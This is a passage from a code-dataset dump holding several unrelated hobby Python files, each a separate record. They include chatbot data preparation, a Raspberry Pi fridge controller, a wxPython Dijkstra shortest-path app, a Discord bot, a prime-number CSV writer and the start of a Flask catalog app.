+++$+++ ')[-1][1:-1].replace(\"'\",\"\").replace(\" \",\"\")\n convs.append(_line.split(','))\n return convs\n\n'''\n 1. Get each conversation\n 2. Get each line from conversation\n 3. Save each conversation to file\n'''\ndef extract_conversations(convs,id2line,path=''):\n idx = 0\n for conv in convs:\n f_conv = open(path + str(idx)+'.txt', 'w')\n for line_id in conv:\n f_conv.write(id2line[line_id])\n f_conv.write('\\n')\n f_conv.close()\n idx += 1\n\n'''\n Get lists of all conversations as Questions and Answers\n 1. [questions]\n 2. [answers]\n'''\ndef gather_dataset(convs, id2line):\n questions = []; answers = []\n\n for conv in convs:\n if len(conv) %2 != 0:\n conv = conv[:-1]\n for i in range(len(conv)):\n if i%2 == 0:\n questions.append(id2line[conv[i]])\n else:\n answers.append(id2line[conv[i]])\n\n return questions, answers\n\n\n'''\n We need 4 files\n 1. train.enc : Encoder input for training\n 2. train.dec : Decoder input for training\n 3. test.enc : Encoder input for testing\n 4. test.dec : Decoder input for testing\n'''\ndef prepare_seq2seq_files(questions, answers, path='',TESTSET_SIZE = 30000):\n\n # open files\n train_enc = open(path + 'train.enc','w')\n train_dec = open(path + 'train.dec','w')\n test_enc = open(path + 'test.enc', 'w')\n test_dec = open(path + 'test.dec', 'w')\n\n # choose 30,000 (TESTSET_SIZE) items to put into testset\n test_ids = random.sample([i for i in range(len(questions))],TESTSET_SIZE)\n\n for i in range(len(questions)):\n if i in test_ids:\n test_enc.write(questions[i]+'\\n')\n test_dec.write(answers[i]+ '\\n' )\n else:\n train_enc.write(questions[i]+'\\n')\n train_dec.write(answers[i]+ '\\n' )\n if i%10000 == 0:\n print('\\n>> written {} lines'.format(i))\n\n # close files\n train_enc.close()\n train_dec.close()\n test_enc.close()\n test_dec.close()\n\n'''\n remove anything that isn't in the vocabulary\n return str(pure en)\n'''\ndef filter_line(line, whitelist):\n return ''.join([ ch for ch in line if ch in whitelist ])\n\n'''\n filter too long and too short sequences\n return tuple( filtered_ta, filtered_en )\n'''\ndef filter_data(qseq, aseq):\n filtered_q, filtered_a = [], []\n raw_data_len = len(qseq)\n\n assert len(qseq) == len(aseq)\n\n for i in range(raw_data_len):\n qlen, alen = len(qseq[i].split(' ')), len(aseq[i].split(' '))\n if qlen >= limit['minq'] and qlen <= limit['maxq']:\n if alen >= limit['mina'] and alen <= limit['maxa']:\n filtered_q.append(qseq[i])\n filtered_a.append(aseq[i])\n\n # print the fraction of the original data, filtered\n filt_data_len = len(filtered_q)\n filtered = int((raw_data_len - filt_data_len)*100/raw_data_len)\n print(str(filtered) + '% filtered from original data')\n\n return filtered_q, filtered_a\n\n'''\n read list of words, create index to word,\n word to index dictionaries\n return tuple( vocab->(word, count), idx2w, w2idx )\n'''\ndef index_(tokenized_sentences, vocab_size):\n # get frequency distribution\n freq_dist = nltk.FreqDist(itertools.chain(*tokenized_sentences))\n # get vocabulary of 'vocab_size' most used words\n vocab = freq_dist.most_common(vocab_size)\n # index2word\n index2word = ['_'] + [UNK] + [ x[0] for x in vocab ]\n # word2index\n word2index = dict([(w,i) for i,w in enumerate(index2word)] )\n return index2word, word2index, freq_dist\n\n'''\n filter based on number of unknowns (words not in vocabulary)\n filter out the worst sentences\n'''\ndef filter_unk(qtokenized, atokenized, w2idx):\n data_len = len(qtokenized)\n\n filtered_q, filtered_a = [], []\n\n for qline, aline in zip(qtokenized, atokenized):\n unk_count_q = len([ w for w in qline if w not in w2idx ])\n unk_count_a = len([ w for w in aline if w not in w2idx ])\n if unk_count_a <= 2:\n if unk_count_q > 0:\n if unk_count_q/len(qline) > 0.2:\n pass\n filtered_q.append(qline)\n filtered_a.append(aline)\n\n # print the fraction of the original data, filtered\n filt_data_len = len(filtered_q)\n filtered = int((data_len - filt_data_len)*100/data_len)\n print(str(filtered) + '% filtered from original data')\n\n return filtered_q, filtered_a\n\n'''\n create the final dataset :\n - convert list of items to arrays of indices\n - add zero padding\n return ( [array_en([indices]), array_ta([indices]) )\n'''\ndef zero_pad(qtokenized, atokenized, w2idx):\n # num of rows\n data_len = len(qtokenized)\n\n # numpy arrays to store indices\n idx_q = np.zeros([data_len, limit['maxq']], dtype=np.int32)\n idx_a = np.zeros([data_len, limit['maxa']], dtype=np.int32)\n\n for i in range(data_len):\n q_indices = pad_seq(qtokenized[i], w2idx, limit['maxq'])\n a_indices = pad_seq(atokenized[i], w2idx, limit['maxa'])\n\n #print(len(idx_q[i]), len(q_indices))\n #print(len(idx_a[i]), len(a_indices))\n idx_q[i] = np.array(q_indices)\n idx_a[i] = np.array(a_indices)\n\n return idx_q, idx_a\n\n\n'''\n replace words with indices in a sequence\n replace with unknown if word not in lookup\n return [list of indices]\n'''\ndef pad_seq(seq, lookup, maxlen):\n indices = []\n for word in seq:\n if word in lookup:\n indices.append(lookup[word])\n else:\n indices.append(lookup[UNK])\n return indices + [0]*(maxlen - len(seq))\n\n# get data from multiple datasets\ndef process_data():\n # read from greetings dataset\n print('\\n>> Read lines from greeting file')\n greetings_q, greetings_a = get_greetings()\n\n # read from history dataset\n print('\\n>> Read lines from history file')\n history_q, history_a = get_history()\n\n # read from conversation dataset\n print('\\n>> Read lines from conversation file')\n conversation_q, conversation_a = get_conversation()\n\n # read from twitter dataset\n print('\\n>> Read lines from twitter file')\n lines = read_lines(filename=FILENAME)\n\n # # change to lower case (just for en)\n # lines = [ line.lower() for line in lines ]\n\n # print('\\n:: Sample from read(p) lines')\n # print(lines[121:125])\n\n # # filter out unnecessary characters\n # print('\\n>> Filter lines')\n # lines = [ filter_line(line, EN_WHITELIST) for line in lines ]\n # print(lines[121:125])\n\n # divide lines into two lists\n print('\\n>> divide lines')\n twitter_q, twitter_a = divide_lines(lines)\n\n # read from cornell dataset\n print('\\n>> Read lines from cornell file')\n cornell_id2line = get_id2line()\n print('>> gathered id2line dictionary from cornell dataset.\\n')\n cornell_convs = get_conversations()\n print(cornell_convs[121:125])\n print('>> gathered conversations.\\n')\n cornell_q, cornell_a = gather_dataset(cornell_convs, cornell_id2line)\n\n print('Greeting dataset:')\n print(greetings_q[0])\n print(greetings_a[0])\n print(len(greetings_q), len(greetings_a))\n\n print('History dataset:')\n print(history_q[0])\n print(history_a[0])\n print(len(history_q), len(history_a))\n\n print('Conversation dataset:')\n print(conversation_q[0])\n print(conversation_a[0])\n print(len(conversation_q), len(conversation_a))\n\n print('Twitter dataset:')\n print(twitter_q[0])\n print(twitter_a[0])\n print(len(twitter_q), len(twitter_a))\n\n print('Cornell dataset:')\n print(cornell_q[0])\n print(cornell_a[0])\n print(len(cornell_q), len(cornell_a))\n\n # merge data from all datasets\n questions = greetings_q + history_q + conversation_q + cornell_q + twitter_q\n answers = greetings_a + history_a + conversation_a + cornell_a + twitter_a\n print(len(questions), len(answers))\n\n # change to lower case (just for en)\n questions = [ line.lower() for line in questions ]\n answers = [ line.lower() for line in answers ]\n\n # filter out unnecessary characters\n print('\\n>> Filter lines')\n questions = [ filter_line(line, EN_WHITELIST) for line in questions ]\n answers = [ filter_line(line, EN_WHITELIST) for line in answers ]\n\n # filter out too long or too short sequences\n print('\\n>> 2nd layer of filtering')\n qlines, alines = filter_data(questions, answers)\n\n for q,a in zip(qlines[141:145], alines[141:145]):\n print('q : [{0}]; a : [{1}]'.format(q,a))\n\n # convert list of [lines of text] into list of [list of words ]\n print('\\n>> Segment lines into words')\n qtokenized = [ [w.strip() for w in wordlist.split(' ') if w] for wordlist in qlines ]\n atokenized = [ [w.strip() for w in wordlist.split(' ') if w] for wordlist in alines ]\n print('\\n:: Sample from segmented list of words')\n\n for q,a in zip(qtokenized[141:145], atokenized[141:145]):\n print('q : [{0}]; a : [{1}]'.format(q,a))\n\n # indexing -> idx2w, w2idx\n print('\\n >> Index words')\n idx2w, w2idx, freq_dist = index_( qtokenized + atokenized, vocab_size=VOCAB_SIZE)\n\n # filter out sentences with too many unknowns\n print('\\n >> Filter Unknowns')\n qtokenized, atokenized = filter_unk(qtokenized, atokenized, w2idx)\n print('\\n Final dataset len : ' + str(len(qtokenized)))\n\n\n print('\\n >> Zero Padding')\n idx_q, idx_a = zero_pad(qtokenized, atokenized, w2idx)\n\n print('\\n >> Save numpy arrays to disk')\n # save them\n np.save('idx_q.npy', idx_q)\n np.save('idx_a.npy', idx_a)\n\n # let us now save the necessary dictionaries\n metadata = {\n 'w2idx' : w2idx,\n 'idx2w' : idx2w,\n 'limit' : limit,\n 'freq_dist' : freq_dist\n }\n\n # write to disk : data control dictionaries\n with open('metadata.pkl', 'wb') as f:\n pickle.dump(metadata, f)\n\n # count of unknowns\n unk_count = (idx_q == 1).sum() + (idx_a == 1).sum()\n # count of words\n word_count = (idx_q > 1).sum() + (idx_a > 1).sum()\n\n print('% unknown : {0}'.format(100 * (unk_count/word_count)))\n print('Dataset count : ' + str(idx_q.shape[0]))\n\n\nimport numpy as np\nfrom random import sample\n\n'''\n split data into train (70%), test (15%) and valid(15%)\n return tuple( (trainX, trainY), (testX,testY), (validX,validY) )\n'''\ndef split_dataset(x, y, ratio = [0.7, 0.15, 0.15] ):\n # number of examples\n data_len = len(x)\n lens = [ int(data_len*item) for item in ratio ]\n\n trainX, trainY = x[:lens[0]], y[:lens[0]]\n testX, testY = x[lens[0]:lens[0]+lens[1]], y[lens[0]:lens[0]+lens[1]]\n validX, validY = x[-lens[-1]:], y[-lens[-1]:]\n\n return (trainX,trainY), (testX,testY), (validX,validY)\n\n'''\nload data from pkl and npy files\n'''\ndef load_data(PATH=''):\n # read data control dictionaries\n with open(PATH + 'metadata.pkl', 'rb') as f:\n metadata = pickle.load(f)\n # read numpy arrays\n idx_q = np.load(PATH + 'idx_q.npy')\n idx_a = np.load(PATH + 'idx_a.npy')\n return metadata, idx_q, idx_a\n\nif __name__ == '__main__':\n process_data()","sub_path":"mysite/data/mixed/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":14847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"484894483","text":"import RPi.GPIO as GPIO\nfrom math import isclose\nfrom time import time,sleep\nfrom w1thermsensor import W1ThermSensor\n\n\nclass BeerFridge(): \n def __init__(self,\n targetTempFile: str = './Contoller/targetTemperature.txt',\n deltaTempFile = './Contoller/deltaTemp.txt',\n currentStateFile = './Contoller/currentState.txt',\n logDataFile = './Contoller/logData.csv',\n RESISTOR_OFF = GPIO.HIGH,\n RESISTOR_ON = GPIO.LOW,\n COMPRESSOR_OFF = GPIO.LOW,\n COMPRESSOR_ON = GPIO.HIGH,\n WARMING = 'warming',\n COOLING = 'cooling',\n TARGETTEMP = 'targettemp',\n DEFROSTING = 'defrosting',\n compressorPin = 14,\n resistorPin = 15,\n compressorOnTime = 3000,\n defrostingTime = 600):\n self.targetTempFile = targetTempFile\n self.deltaTempFile = deltaTempFile\n self.currentStateFile = currentStateFile\n self.logDataFile = logDataFile\n self.RESISTOR_OFF = RESISTOR_OFF\n self.RESISTOR_ON = RESISTOR_ON\n self.COMPRESSOR_ON = COMPRESSOR_ON\n self.COMPRESSOR_OFF = COMPRESSOR_OFF\n self.WARMING = WARMING\n self.COOLING = COOLING\n self.TARGETTEMP = TARGETTEMP\n self.DEFROSTING = DEFROSTING\n self.compressor = compressorPin\n self.resistor = resistorPin\n self.tempList = []\n self.targetTemp = self.deltaTemp = self.currentTemp = 0\n self.timeCooler = self.timeResistor = 0\n self.currentState = ''\n self.tempController = W1ThermSensor()\n self.tempControllerType = 'W1'\n self.compressorState = COMPRESSOR_OFF\n self.resistorState = RESISTOR_OFF\n self.compressorOnTime = compressorOnTime\n self.defrostingTime = defrostingTime\n self.SetDefaultState()\n\n def GetCurrentStates(self):\n self.SetCurrentTemp()\n\n with open(self.targetTempFile,'r') as fin:\n self.targetTemp = float(fin.read())\n with open(self.deltaTempFile,'r') as fin:\n self.deltaTemp = float(fin.read())\n with open(self.currentStateFile,'r') as fin:\n self.currentState = fin.read()\n\n def GetTemp(self):\n return self.tempController.get_temperature()\n\n def SetCurrentTemp(self):\n self.tempList.append(self.GetTemp())\n self.tempList = self.tempList[1:]\n print(self.tempList)\n self.currentTemp = round(sum(self.tempList)/len(self.tempList),2)\n\n\n def SetDefaultState(self):\n for _ in range(5):\n self.tempList.append(self.GetTemp())\n sleep(.1)\n print(self.tempList)\n self.SetCurrentTemp()\n\n GPIO.output(self.resistor,self.RESISTOR_OFF)\n with open(self.targetTempFile,'r') as fin:\n self.targetTemp = fin.read()\n with open(self.currentStateFile,'w') as fout:\n self.currState = self.WARMING if float(self.targetTemp) > float(self.currentTemp) else self.COOLING\n if self.currState == self.WARMING:\n self.timeCooler = time()\n fout.write(self.currState)\n print(f'Setting first state as {self.currState}')\n\n def SetCurrentState(self,newState):\n self.currentState = newState\n with open(self.currentStateFile,'w') as fout:\n fout.write(newState)\n \n def DefineNextStage(self):\n\n # Am I defrosting?\n if self.currentState == self.DEFROSTING:\n currTime = time()\n if currTime - self.timeResistor >= self.defrostingTime:\n self.resistorState = self.RESISTOR_OFF\n GPIO.output(self.resistor,self.RESISTOR_OFF)\n self.timeResistor = 0\n self.SetCurrentState(self.COOLING)\n\n # Is around the target temp?!\n elif isclose(self.targetTemp,self.currentTemp,abs_tol=0.01):\n self.compressorState = self.COMPRESSOR_OFF\n self.timeCooler = 0\n GPIO.output(self.compressor, self.COMPRESSOR_OFF)\n self.SetCurrentState(self.TARGETTEMP)\n # Current temperature is Higher than target tem?\n elif self.currentTemp > self.targetTemp:\n\n if self.currentState == self.WARMING:\n self.compressorState = self.COMPRESSOR_OFF\n self.timeCooler = 0\n GPIO.output(self.compressor, self.COMPRESSOR_OFF)\n self.SetCurrentState(self.TARGETTEMP)\n\n elif self.currentState == self.COOLING:\n self.compressorState = self.COMPRESSOR_ON\n currTime = time()\n\n if self.timeCooler == 0:\n self.timeCooler = currTime\n\n if currTime - self.timeCooler >= self.compressorOnTime:\n GPIO.output(self.compressor,self.COMPRESSOR_OFF)\n #self.compressorState = self.OFF\n self.SetCurrentState(self.DEFROSTING)\n GPIO.output(self.resistor,self.RESISTOR_ON)\n self.resistorState = self.RESISTOR_ON\n self.timeResistor = currTime\n self.timeCooler = 0\n\n else:\n GPIO.output(self.compressor, self.COMPRESSOR_ON)\n self.SetCurrentState(self.COOLING)\n\n elif self.currentState == self.TARGETTEMP:\n\n if self.currentTemp >= self.targetTemp + self.deltaTemp:\n self.compressorState = self.COMPRESSOR_ON\n GPIO.output(self.compressor, self.COMPRESSOR_ON)\n self.SetCurrentState(self.COOLING)\n\n else:\n self.compressorState = self.COMPRESSOR_OFF\n GPIO.output(self.compressor, self.COMPRESSOR_OFF)\n self.SetCurrentState(self.TARGETTEMP)\n\n else: \n print('What state is it?!?!')\n\n # Ok, current temperature is below target temp\n else:\n if self.currentState == self.WARMING:\n self.compressorState = self.COMPRESSOR_OFF\n GPIO.output(self.compressor, self.COMPRESSOR_OFF)\n self.SetCurrentState(self.WARMING)\n elif self.currentState == self.COOLING:\n self.compressorState = self.COMPRESSOR_OFF\n self.SetCurrentState(self.WARMING)\n self.resistorState = self.RESISTOR_OFF\n self.timeResistor = time()\n self.timeCooler = 0\n\n elif self.currentState == self.TARGETTEMP:\n\n if self.currentTemp >= self.targetTemp - self.deltaTemp:\n self.compressorState = self.COMPRESSOR_OFF\n GPIO.output(self.compressor, self.COMPRESSOR_OFF)\n self.SetCurrentState(self.TARGETTEMP)\n\n else:\n self.compressorState = self.OFF\n GPIO.output(self.compressor, self.COMPRESSOR_OFF)\n self.SetCurrentState(self.WARMING)\n\n else: \n print('What state is it?!?!')\n \n def PrintInfo(self,log=True):\n lineBreak = '\\n\\t'\n compressorState = 'OFF' if self.compressorState == self.COMPRESSOR_OFF else 'ON'\n resistorState = 'OFF' if self.resistorState == self.RESISTOR_OFF else 'ON'\n print(f'Current stage:{lineBreak}Temp: {round(self.currentTemp,2)}{lineBreak}Target: {self.targetTemp}{lineBreak}Current State: {self.currentState}{lineBreak}Compressor: {compressorState}{lineBreak}Resistor: {resistorState}')\n if log:\n with open(self.logDataFile,'a') as fLog:\n fLog.write(f'{round(self.currentTemp,2)},{self.targetTemp},{self.currentState},{compressorState},{resistorState},{time()}\\n')\n","sub_path":"Python Code/BeerFridge/BeerFridge.py","file_name":"BeerFridge.py","file_ext":"py","file_size_in_byte":7777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"641517433","text":"#!/usr/bin/python3\n\n\"\"\"\n World alcohol data\n\n\"\"\"\n\nimport pandas as pd\n\n\ndef main():\n \"\"\"\n Main Function\n \"\"\"\n\n link = \"https://raw.githubusercontent.com/sinanuozdemir/principles_of_data_science\" \\\n \"/master/data/chapter_2/drinks.csv\"\n\n drinks = pd.read_csv(link)\n # printing first 5 rows of csv\n print(drinks.head())\n\n # printing first 5 rows of csv\n print(\"Continent description\", drinks['continent'].describe())\n\n # quantitative column\n print(\"Beer servings description\", drinks['beer_servings'].describe())\n","sub_path":"Types Of Data/World_alcohol_data.py","file_name":"World_alcohol_data.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"272069714","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\"ppcsv.py Finds Primes Really Fast and stores them in primelist.csv.\"\"\"\r\nimport sys\r\nimport time\r\nimport fastcsv\r\nfrom pyprimesieve import primes\r\n\r\n# Copyright 2020 David Kevin Britt\r\n#\r\n# dkbritt7174@gmail.com\r\n# This file contains the PyPrimeSieve module.\r\n#\r\n# This program is free software; you can redistribute it and/or modify\r\n# it under the terms of the GNU General Public License as published by\r\n# the Free Software Foundation; either version 2 of the License, or\r\n# (at your option) any later version.\r\n#\r\n# This program is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n# GNU General Public License for more details.\r\n#\r\n# You should have received a copy of the GNU General Public License\r\n# along with this program; if not, see .\r\n\r\n\r\n__copyright__ = \"Copyright (C) 1-10-2020 David Kevin Britt\"\r\n__license__ = \"GPL\"\r\n__version__ = \"3.1\"\r\n__maintainer__ = \"David Kevin Britt\"\r\n__email__ = \"dkbritt64118@gmail.com\"\r\n__status__ = \"Beta\"\r\n\r\nST = time.perf_counter_ns()\r\n\r\ndef main() -> None:\r\n \"\"\"Python ppcsv.py (n) and n is the upper limit.\"\"\"\r\n\r\n\r\ndef testforinput():\r\n \"\"\"If no input display example.\"\"\"\r\n\r\n try:\r\n sys.argv[1]\r\n except IndexError:\r\n sys.exit(main.__doc__)\r\n\r\ntestforinput()\r\n\r\nLIMIT_MAX = sys.argv[1]\r\nCSVPRIME_LIST = primes(int(LIMIT_MAX))\r\n\r\n\r\ndef writetocsv():\r\n \"\"\" Writes the numbers to .csv file very quickly.\"\"\"\r\n\r\n with open('PRIMELIST.csv', 'w', encoding='cp932') as file_iter:\r\n writer = fastcsv.Writer(file_iter)\r\n writer.writerow(CSVPRIME_LIST)\r\n writer.flush()\r\n\r\nwritetocsv()\r\n\r\nET = time.perf_counter_ns()-ST\r\nprint()\r\nprint(ET/1000000000, \" seconds\")\r\n","sub_path":"ppcsv.py","file_name":"ppcsv.py","file_ext":"py","file_size_in_byte":1866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"639373560","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Nov 12 10:34:18 2017\r\n\r\n@author: Administrator\r\n\"\"\"\r\nimport wx\r\nimport numpy as np\r\nimport copy\r\n\r\nclass Frame1(wx.Frame):\r\n def __init__(self,superior):\r\n wx.Frame.__init__(self,parent=superior,title='最短路算法',pos=(300,200),size=(350,200))\r\n panel=wx.Panel(self)\r\n hsizer=wx.BoxSizer(wx.HORIZONTAL)\r\n rootname=wx.StaticText(parent=panel,id=-1,label='文件路径名',size=(60,20))\r\n hsizer.Add(rootname,0,wx.ALIGN_LEFT,50)\r\n self.rootwhite=wx.TextCtrl(panel,id=-1,value='输入文件路径名',size=(145,20))\r\n hsizer.Add(0,0,wx.EXPAND)\r\n hsizer.Add(self.rootwhite,wx.ALIGN_CENTER,border=50)\r\n self.OK_command=wx.Button(panel,label='确定',size=(40,20))\r\n hsizer.Add(0,0,wx.EXPAND)\r\n hsizer.Add(self.OK_command,border=10)\r\n \r\n hsizer2=wx.BoxSizer(wx.HORIZONTAL)\r\n insertnodename=wx.StaticText(panel,-1,label='输入终结点 ')\r\n hsizer2.Add(insertnodename)\r\n self.insertnode=wx.TextCtrl(panel,-1,size=(100,20))\r\n hsizer2.Add(self.insertnode,0,wx.ALIGN_CENTER_HORIZONTAL)\r\n \r\n outputname=wx.StaticText(panel,-1,'最短路')\r\n self.output=wx.TextCtrl(panel,-1,'',size=(350,20))\r\n \r\n outputdis=wx.StaticText(panel,-1,'最短距离')\r\n self.disoutput=wx.TextCtrl(panel,-1,'',size=(350,20))\r\n \r\n vsizer=wx.BoxSizer(wx.VERTICAL)\r\n vsizer.Add(hsizer)\r\n vsizer.Add((-1,10))\r\n vsizer.Add(hsizer2)\r\n vsizer.Add((-1,10))\r\n vsizer.Add(outputname)\r\n vsizer.Add((-1,5))\r\n vsizer.Add(self.output)\r\n vsizer.Add((-1,2))\r\n vsizer.Add(outputdis)\r\n vsizer.Add((-1,5))\r\n vsizer.Add(self.disoutput)\r\n panel.SetSizerAndFit(vsizer)\r\n panel.Layout()\r\n \r\n panel.Bind(wx.EVT_BUTTON,self.OKclick,self.OK_command)\r\n #panel.Bind()\r\n \r\n \r\n def OKclick(self,event):\r\n address=self.rootwhite.GetValue()\r\n end=int(self.insertnode.GetValue())\r\n dot_num=0\r\n link_num=0\r\n ii=[]\r\n ij=[]\r\n class dot:\r\n dot_id=[0]\r\n dot_accend=[0]\r\n bengin_link=[0]\r\n end_link=[0]\r\n pass\r\n class link:\r\n link_id=[0]\r\n from_dot=[0]\r\n end_dot=[0]\r\n time_consume=[0]\r\n distance_consume=[0]\r\n cost_consume=[0]\r\n pass\r\n \r\n dot_example=dot()\r\n link_example=link()\r\n file=open(address)\r\n line=file.readlines()\r\n p1=[]\r\n p2=[]\r\n lj=[]\r\n lj2=[]\r\n Q1={1:0}\r\n Q1_index=[1]\r\n Q1_value=[0]\r\n inf=100000000000000000\r\n k=10000000000000000000000000\r\n #print(line)\r\n\r\n dot_num=line[0]\r\n dot_num.strip('\\n')\r\n dot_num=int(dot_num)\r\n for i in range(1,1+dot_num):\r\n line_str=line[i]\r\n ii.extend(line_str.strip().split(' '))\r\n ii_1=[float(x) for x in ii]\r\n dot_width=int(len(ii_1)/dot_num)\r\n ii_1=np.array(ii_1)\r\n ii_1=ii_1.reshape((dot_num,2))\r\n for i in range(dot_num):\r\n dot_example.dot_id.append(i+1) \r\n dot_example.bengin_link.append(ii_1[i][0])\r\n dot_example.end_link.append(ii_1[i][1])\r\n \r\n link_num=line[1+dot_num]\r\n link_num.strip('\\n')\r\n link_num=int(link_num)\r\n for i in range(2+dot_num,2+dot_num+link_num):\r\n dot_str=line[i]\r\n ij.extend(dot_str.strip().split(' '))\r\n ij_1=[float(x) for x in ij]\r\n link_width=int(len(ij_1)/link_num)\r\n ij_1=np.array(ij_1)\r\n ij_1=ij_1.reshape((link_num,link_width))\r\n for i in range(link_num):\r\n link_example.link_id.append(i) \r\n link_example.from_dot.append(ij_1[i][0])\r\n link_example.end_dot.append(ij_1[i][1])\r\n link_example.time_consume.append(ij_1[i][2])\r\n link_example.distance_consume.append(ij_1[i][3])\r\n link_example.cost_consume.append(ij_1[i][4])\r\n\r\n dot_example.dot_id=[int(x) for x in dot_example.dot_id]\r\n dot_example.bengin_link=[int(x) for x in dot_example.bengin_link]\r\n dot_example.end_link=[int(x) for x in dot_example.end_link]\r\n link_example.link_id=[int(x) for x in link_example.link_id]\r\n link_example.from_dot=[int(x) for x in link_example.from_dot]\r\n link_example.end_dot=[int(x) for x in link_example.end_dot]\r\n\r\n #赋初值,并且做字典\r\n for i in range(934):\r\n lj.append(inf)\r\n lj2.append(inf)\r\n p1.append(-1)\r\n p2.append(-1)\r\n lj[0]=k\r\n lj2[0]=k\r\n lj[1]=0\r\n lj2[1]=0\r\n p1[0]=-5\r\n p2[0]=-5\r\n p1[1]=-1\r\n p2[1]=-1\r\n P1=dict(zip(dot_example.dot_id,p1))\r\n P2=dict(zip(dot_example.dot_id,p2))\r\n Lj=dict(zip(dot_example.dot_id,lj))\r\n Lj2=dict(zip(dot_example.dot_id,lj2))\r\n\r\n #label setting运算\r\n while Q1: \r\n #print(Lj)\r\n i=min(Q1,key=Q1.get) #argmin函数\r\n Q1.pop(i)\r\n a=Q1_index.index(i)\r\n Q1_index.pop(a)\r\n Q1_value.pop(a)\r\n dot_link=[x for x in range(int(dot_example.bengin_link[i]),int(dot_example.end_link[i])+1)]#找出点连的线\r\n for j in dot_link:\r\n if Lj[i]+link_example.cost_consume[j]')\r\n point=int(point)\r\n point=P1_values[point]\r\n if point==-1:\r\n self.output.AppendText('0')\r\n break\r\n\r\n pass\r\napp=wx.App()\r\nframe=Frame1(None)\r\nframe.Show(True)\r\napp.MainLoop()","sub_path":"Dijkstra_app.py","file_name":"Dijkstra_app.py","file_ext":"py","file_size_in_byte":6621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"650822871","text":"#! /usr/bin/python3\n#! -*- coding: utf8 -*-\n\nimport fileinput\nimport csv\nfrom datetime import datetime\nfrom datetime import timedelta\n\n\nif __name__ == '__main__':\n\n stdin = fileinput.input()\n data = list(csv.reader(stdin))\n\n header = data[0]\n del data[0]\n\n pairs = {}\n\n format_string = '%Y-%m-%dT%H:%M:%S'\n\n for flight1 in data:\n num1 = flight1[4]\n departure1 = datetime.strptime(flight1[2], format_string)\n arrival1 = datetime.strptime(flight1[3], format_string)\n\n source = flight1[0]\n dest = flight1[1]\n\n for flight2 in data:\n num2 = flight2[4]\n departure2 = datetime.strptime(flight2[2], format_string)\n arrival2= datetime.strptime(flight2[3], format_string)\n\n source2 = flight2[0]\n dest2 = flight2[1]\n\n\n if (num1 != num2 and\n dest == source2 and\n (timedelta(hours=4) >= departure2 - arrival1 >= timedelta(hours=1))):\n if not num2 in pairs.keys():\n pairs[num2] = [num1]\n else:\n pairs[num2].append(num1)\n\n print(pairs)\n","sub_path":"entry.py","file_name":"entry.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"13948459","text":"import discord\nfrom discord.ext.commands import Bot\nimport configparser\nimport os\nfrom override import Override\n\nconfig = configparser.ConfigParser()\nconfig.read('./data/config/config.ini')\n\nbot = Override(command_prefix='$', description=config.get('bot', 'description'),\n pm_help=config.getboolean('bot', 'pm_help'), self_bot=not config.getboolean('bot', 'use_token'))\n\ncogs = [f for f in os.listdir(\"./cogs\") if os.path.isfile(os.path.join(\"./cogs\", f))]\n\n\n@bot.event\nasync def on_ready():\n\n print('Logged in as: {}\\n'\n 'Id: {} \\n'\n 'Prefix: {}'.format(bot.user.name, bot.user.id, bot.command_prefix))\n for cog in cogs: \n cog = cog.replace('.py', '')\n try:\n bot.load_extension('cogs.' + cog)\n print(cog)\n except Exception as e:\n print('\\tError: {}'.format(type(e).__name__, e))\n\n\n@bot.event\nasync def on_message(message):\n await bot.process_commands(message)\n\nif not config.getboolean('bot', 'use_token'):\n bot.run(config.get('user', 'email'), config.get('user', 'password'))\nelse:\n bot.run('bot', 'token')\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"545512520","text":"\"\"\"\nProblem 1389 - Create Target Array in the Given Order\n\nGiven two arrays of integers nums and index. Your task is to create target \narray under the following rules:\n\nInitially target array is empty.\n- From left to right read nums[i] and index[i], insert at index index[i] the \n value nums[i] in target array.\n- Repeat the previous step until there are no elements to read in nums and \n index.\n\nReturn the target array.\n\"\"\"\n\nfrom typing import List\n\n\nclass Solution:\n def createTargetArray(\n self, nums: List[int], index: List[int]\n ) -> List[int]:\n target = []\n for i in range(len(nums)):\n target.insert(index[i], nums[i])\n return target\n\n\nif __name__ == \"__main__\":\n nums = [0, 1, 2, 3, 4]\n index = [0, 1, 2, 2, 1]\n\n # Should return [0, 4, 1, 3, 2]\n print(Solution().createTargetArray(nums, index))\n","sub_path":"python/problem-1389.py","file_name":"problem-1389.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"417767504","text":"#!/usr/bin/env python\n\n\"\"\"__init__.py: implementation of the Item Catalog project.\"\"\"\n\nimport httplib2\nfrom flask import (\n flash,\n Flask,\n jsonify,\n make_response,\n redirect,\n render_template,\n request,\n session as login_session,\n url_for,\n)\nfrom login_utils import (\n authorization_required,\n facebookOAuth2Connect,\n getNewState,\n googleOAuth2Connect,\n login_required,\n valid_state_token_required,\n)\nfrom db_utils import (\n createCategory,\n createItem,\n getAllCategories,\n getAllItemsInCategory,\n getCategory,\n getItem,\n getSerializedContent,\n removeCategory,\n removeItem,\n updateCategory,\n updateItem,\n)\n\n\napp = Flask(__name__)\n\n\n@app.route('/index/')\n@app.route('/')\ndef index():\n \"\"\"The view for the front page of the site.\n\n Returns:\n The rendered front page.\"\"\"\n return render_template(\n 'index.html',\n user=login_session,\n categories=getAllCategories())\n\n\n@app.route('/categories//')\ndef showAllItemsInCategory(category_id):\n \"\"\"The view for all of the items in a given category.\n\n Args:\n category_id: 